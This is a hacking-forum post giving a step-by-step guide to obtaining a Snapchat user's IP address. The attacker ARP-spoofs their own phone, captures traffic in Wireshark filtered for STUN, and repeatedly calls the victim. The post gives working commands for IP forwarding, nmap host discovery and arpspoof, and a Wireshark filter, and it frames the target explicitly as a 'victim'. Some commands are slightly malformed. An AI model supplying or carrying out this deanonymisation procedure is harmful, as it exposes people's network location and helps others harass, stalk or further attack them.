November 17, 2022 at 5:51 PM
[color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]I did not see anything related to Snapchat MITM in this forum so I decided to make one.[hide]Here is some things you will need in order to make this work:Requirements:[/font][/color][list][*][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Mac OS / Kali linux[/font][/color][*][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]A phone where you have snapchat on[/font][/color][*][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Some tools and little MITM knowledge [/font][/color][/list][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Here's how it's done:[/font][/color][list][*][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Download Wireshark -> [url=https://www.wireshark.org/]https://www.wireshark.org[/url][/font][/color][*][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Download arpspoof for Mac -> [url=https://github.com/ivanvza/arpy]https://github.com/ivanvza/arpy[/url][/font][/color][/list][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]1. Fire up terminal and ip forward your laptop/pc with this scripts:[/font][/color][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]On Kali:[/font][/color][code]sudo sysctl net.ipv4.ip_forward = 1 sudo net.ipv4.ip_forward = 1[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]On Mac: [/font][/color][code]sudo sysctl -w net.inet.ip.forwarding=1[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]2. Find your phone device local ip and write it down.[/font][/color][code]nmap -sn (or -sP) /24[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Example:[/font][/color][code]nmap -sn 192.168.0.1/24[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]3. Spoof your phone.[/font][/color][code]arpspoof -i -t gateway[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Example: [/font][/color][code]arpspoof -i en0 -t 192.168.0.160 192.168.0.1[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:[/font][/color][code]arpspoof -i en0 -t 192.168.0.1 192.168.0.160[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]4. Fire up Wireshark and filter on your phone ip with STUN protocol[/font][/color][code]ip.addr == && stun[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Example: [/font][/color][code]ip.addr == 192.168.0.160 && stun[/code][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]5. Call your victim on snap and keep calling him for around 5 seconds.[/font][/color][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Wireshark should throw up some binding requests, then some STUN ones. [color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif]Those last ones are your victim's ip.[/font][/color][/font][/color][color=#bcbcbc][font='helvetica neue', Arial, Verdana, sans-serif][img]https://external-content.duckduckgo.com/iu/?u=https://i.imgur.com/lfOiG8b.png[/img][/hide][/font][/color]

